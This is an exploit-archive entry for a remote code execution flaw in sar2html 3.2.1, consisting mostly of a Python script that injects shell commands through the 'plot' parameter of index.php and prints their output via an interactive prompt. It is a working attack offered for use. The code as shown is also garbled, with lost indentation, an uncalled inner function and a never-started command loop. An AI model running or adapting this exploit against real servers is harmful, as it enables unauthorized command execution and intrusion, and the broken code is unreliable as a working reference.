sar2html 3.2.1 Remote Code Execution

sar2html version 3.2.1 remote code execution exploit. Original discovery for this vector of attack is attributed to Furkan Kayapinar in August of 2019.

MD5 | bc607c1eddfe53e9df710be0c5a8bb3d

# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:
# Software Link:
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

#!/usr/bin/env python3

import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
prompt = "Command => "
def default(self, args):

def exploiter(cmd):
global url
sess = requests.session()
output = sess.get(f"{url}/index.php?plot=;{cmd}")
out = re.findall("<option value=(.*?)>", output.text)
print ("Error!!")
for ouut in out:
if "There is no defined host..." not in ouut:
if "null selected" not in ouut:
if "selected" not in ouut:
print (ouut)
print ()

if __name__ == ("__main__"):
terminal = Terminal()

Related Posts